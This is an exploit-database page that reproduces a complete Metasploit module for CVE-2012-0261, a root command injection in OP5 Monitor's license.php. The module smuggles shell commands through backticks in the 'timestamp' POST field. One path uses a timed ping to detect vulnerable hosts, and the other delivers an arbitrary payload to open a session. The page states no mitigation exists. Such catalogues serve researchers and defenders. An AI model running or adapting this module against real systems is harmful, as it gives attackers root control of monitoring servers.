header-logo
Suggest Exploit
vendor:
OP5 Monitor
by:
Peter Osterberg
N/A
CVSS
N/A
Remote Command Execution
78
CWE
Product Name: OP5 Monitor
Affected Version From: 5.3.5
Affected Version To: 5.5.1
Patch Exists: NO
Related CWE: CVE-2012-0261, OSVDB-78064
CPE: a:op5:op5_monitor
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix
2012

OP5 license.php Remote Command Execution

This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.

Mitigation:

No known mitigation or remediation for this vulnerability
Source

Exploit-DB raw data:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OP5 license.php Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary root command execution vulnerability in the
        OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
        5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
      },
      'Author'     => [ 'Peter Osterberg <j[at]vel.nu>' ],
      'License'    => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2012-0261'],
          ['OSVDB', '78064'],
          ['URL', 'http://secunia.com/advisories/47417/'],
        ],
      'Privileged' => true,
      'Payload'    =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'BadChars'    => '`\\|',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'perl ruby python',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jan 05 2012',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('URI', [true, "The full URI path to license.php", "/license.php"]),
        ], self.class)
  end

  def check
    vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
    vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")

    # Try running/timing 'ping localhost' to determine is system is vulnerable
    start = Time.now

    data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install';
    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'proto'   => 'HTTPS',
      'data'    => data,
      'headers' =>
      {
        'Connection'     => 'close',
      }
    }, 25)
    elapsed = Time.now - start
    if elapsed >= 5
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")

    data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';

    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'proto'   => 'HTTPS',
      'data'    => data,
      'headers' =>
      {
        'Connection'     => 'close',
      }
    }, 25)

    if(not res)
      if session_created?
        print_status("Session created, enjoy!")
      else
        print_error("No response from the server")
      end
      return
    end
  end
end

Navigation

Suggest Exploit

Services By CQR